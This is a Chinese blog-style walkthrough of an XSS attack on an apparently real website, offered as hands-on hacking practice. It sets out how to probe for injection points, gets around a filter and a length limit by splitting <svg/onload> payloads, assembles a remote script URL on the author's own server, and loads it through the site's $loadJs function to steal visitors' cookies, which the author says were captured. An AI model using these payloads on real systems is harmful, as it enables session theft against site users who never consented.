关于如何被动暂且不谈
我只想说xss真帅啊
1.好了不多说了开搞
2.要不开始看图吧
- xss的介绍我就不说了
- 这次一次实战演练
对于一个新手来说必须要对xss挖掘有明确的思路
0x01:拿到一个站,必须要先去寻找这个站最有可能存在的xss(输出点)
![RS}G2ITC5VFZZD[{R~]AZX.png
![D90TDO4(P(VZ]J@FOH3(~LF.png](http://upload-images.jianshu.io/upload_images/2495234-28a6cfa024526959.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
0x02:然后构造一个poc
0x03:观察构造的poc能否被触发
1.如果可以触发,证明会有xss漏洞的存在,
2.不能触发,基本证明不存在xss漏洞
4.没办法继续寻找可能存在xss的输入点,重复以上的操作寻找输入点。
但是页面并没有触发弹窗,猜想可能是过滤特殊标签<script>
你又防护罩,我有激光炮,嘿嘿嘿~ 既然你可以然我输入那就继续构造poc
![YVTWB}RC)]`BA609SP@@$30.png](http://upload-images.jianshu.io/upload_images/2495234-b6d3c33c35f78761.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
现在我们就来实现心中的梦想,搞站了
远程加载js,获取cookie
构造Exploit,但是有字符长度限制,所以寻找更短的payload
a=document.createElement('script');
a.src=xxx /你的远程js地址
document.head.append(child)
但是长度依然超过限制
精短构造
a=documnet;
b='script'
a.createElement(b) !!!已经是最简短的 创建js标签
现在我们就要想,既然需要 <script>标签,观察这个网站自己是否加载了jQuery,But"灭有"
继续观察
接下来,就一起嘿嘿嘿喽~~~
$loadJs() 对方网站的js api
重新构造payload
<svg/onload="b='http://123'">
<svg/onload="b+='.123.23.23'">
<svg/onload="b+='/xx.js'">
<svg/onload="$loadJs(b)">
远程加载的js文件,自己搭建的外网ip
![B4P`DD69Q]BMJUUXW%YEEAV.png](http://upload-images.jianshu.io/upload_images/2495234-3d2b1c8b3e5a3c91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
要不要看一看cookie呀~~
猪吟~
以上只是部分Cookie,涉及敏感信息。
以后多有文章,现在是起步中,共同学习。